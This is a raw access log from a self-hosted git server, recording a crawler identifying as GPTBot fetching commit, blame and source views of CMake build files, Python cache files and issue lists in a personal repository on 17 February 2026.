"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10329] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:18:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13918] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12464] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13917] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fnotifier.cpython-312.pyc" [Client 74.7.227.38] [Length 20814] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:18:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fstorage.cpython-312.pyc" [Client 74.7.227.38] [Length 20821] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:18:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fcalculator.cpython-312.pyc" [Client 74.7.227.38] [Length 20809] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:18:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13526] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13484] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13561] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13560] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24307] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 